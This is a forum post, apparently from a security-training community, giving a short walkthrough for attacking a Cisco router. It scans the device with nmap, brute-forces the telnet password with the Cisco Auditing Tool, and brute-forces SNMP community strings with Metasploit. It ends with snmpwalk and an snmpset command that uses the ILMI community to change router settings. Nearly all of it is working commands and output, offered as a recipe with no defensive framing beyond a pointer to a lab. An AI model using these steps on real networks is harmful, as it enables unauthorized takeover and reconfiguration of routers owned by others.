Simple Attack Router Cisco

Viewing 0 reply threads
  • Author
    Posts
    • #8883
      hackersmooth88
      Participant

      Hello Anybody,

      I want to share about How to simple attack Router, maybe in case Router Cisco

      First we must scanning with nmap : we can combine attack TCP and UDP..

      We hope router open remote access (tcp) and snmp in port (udp)

      Use Backtrack or Kali Linux :
      nmap -sS -sU -T5 192.168.2.1

      29954U@root:/pentest/cisco$ nmap -sS -sU -T5 192.168.2.1

      Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-05-12 09:04 EDT
      Warning: 192.168.2.1 giving up on port because retransmission cap hit (2).
      Nmap scan report for 192.168.2.1
      Host is up (0.0022s latency).
      Not shown: 1248 closed ports, 749 open|filtered ports
      PORT STATE SERVICE
      23/tcp open telnet
      79/tcp open finger
      161/udp open snmp
      MAC Address: 00:02:FD:60:77:20 (Cisco Systems)

      and then you can see port 23/tcp and 161/udp is open, so we can attack now

      Telnet : We can bruteforce using hydra or cisco tools

      29954U@root:/pentest/cisco/cisco-auditing-tool$ ./CAT -h 192.168.2.1 -w /pentest/passwords/john/password.lst

      Cisco Auditing Tool – g0ne [null0]

      Checking Host: 192.168.2.1

      Guessing passwords:

      Invalid Password: cisco
      Invalid Password: ciscos
      Invalid Password: cisco1
      Invalid Password: router

      now you can attack snmp to bruteforce with msfconsole :

      msf > use auxiliary/scanner/snmp/snmp_login
      msf auxiliary(snmp_login) > set RHOSTS 192.168.2.1
      rhosts => 192.168.2.1
      msf auxiliary(snmp_login) > set THREADS 3
      threads => 3
      msf auxiliary(snmp_login) > exploit

      if success you can see community to read and write…

      You can command

      snmpwalk -mALL -v1 -c public 192.168.2.1

      or if you must exploit you can change with

      snmpset -c ILMI -v 2c 192.168.2.1 1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1

      All techniq about change you can see in wiki snmpset

      Detail Lab : hackingdojo.com

Viewing 0 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2020 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?